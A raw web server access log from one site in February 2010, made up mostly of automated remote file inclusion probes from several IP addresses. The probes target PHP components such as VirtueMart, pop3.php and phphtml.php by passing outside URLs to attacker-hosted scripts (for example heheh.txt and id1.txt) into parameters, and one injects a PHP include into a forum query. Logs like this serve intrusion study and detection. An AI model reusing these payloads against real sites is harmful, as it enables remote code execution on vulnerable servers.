64.15.158.246 - - [11/Feb/2010:05:12:11 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:05:12:31 -0800] "GET /logs/access_100126.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:13:24 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:13:24 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:13:24 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:05:13:29 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:13:49 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:14:07 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:14:08 -0800] "GET /orange_g/forum/viewtopic.php?p=25955 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:14:12 -0800] "GET /orange_g/forum/viewtopic.php?p=28123 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
213.186.58.214 - - [11/Feb/2010:05:14:35 -0800] "GET /logs/phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [11/Feb/2010:05:14:35 -0800] "GET /phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [11/Feb/2010:05:14:35 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [11/Feb/2010:05:14:40 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:15:59 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:05:16:10 -0800] "GET /logs/access_100115.log%20%20/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:05:16:10 -0800] "GET /com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:05:16:10 -0800] "GET /logs/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:17 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:18 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:43 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:16:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:17:23 -0800] "GET /logs/access_100103.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:17:40 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:17:55 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:18:36 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:18:39 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:19:12 -0800] "GET /logs/access_100103.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:19:26 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [11/Feb/2010:05:19:44 -0800] "GET /logs/access_100109.log/phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [11/Feb/2010:05:20:10 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [11/Feb/2010:05:20:10 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [11/Feb/2010:05:20:10 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [11/Feb/2010:05:20:11 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
114.108.128.160 - - [11/Feb/2010:05:20:15 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:20:15 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:20:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [11/Feb/2010:05:20:23 -0800] "GET /logs/access_100126.log/phphtml.php?htmlclass_path=http://magodebian.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:20:36 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:20:36 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:20:36 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:21:30 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:21:43 -0800] "GET /logs/access_100103.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:46 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:46 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:49 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:49 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:21:55 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:55 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:21:55 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:22:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:22:01 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:05:22:01 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:38 -0800] "GET /logs/access_100114.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:39 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:40 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:41 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:42 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:47 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:48 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:48 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:48 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:48 -0800] "GET /logs/access_100114.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:49 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:23:49 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:24:14 -0800] "GET /logs/access_100109.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:24:23 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:24:26 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:24:33 -0800] "GET /logs/access_100109.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:41 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:42 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:25:48 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:25:48 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:25:48 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:49 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:49 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:50 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:53 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:53 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:54 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:56 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:25:59 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:00 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:00 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:01 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:01 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:11 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:13 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:24 -0800] "GET /logs/access_100122.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:26 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:05:26:30 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:35 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:39 -0800] "GET /logs/access_100122.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:45 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:26:47 -0800] "GET /logs/access_100122.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:27:01 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:27:02 -0800] "GET /orange_g/forum/viewtopic.php?p=28103 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
75.125.143.154 - - [11/Feb/2010:05:27:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:27:47 -0800] "GET /logs/access_100122.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:27:52 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:29:14 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
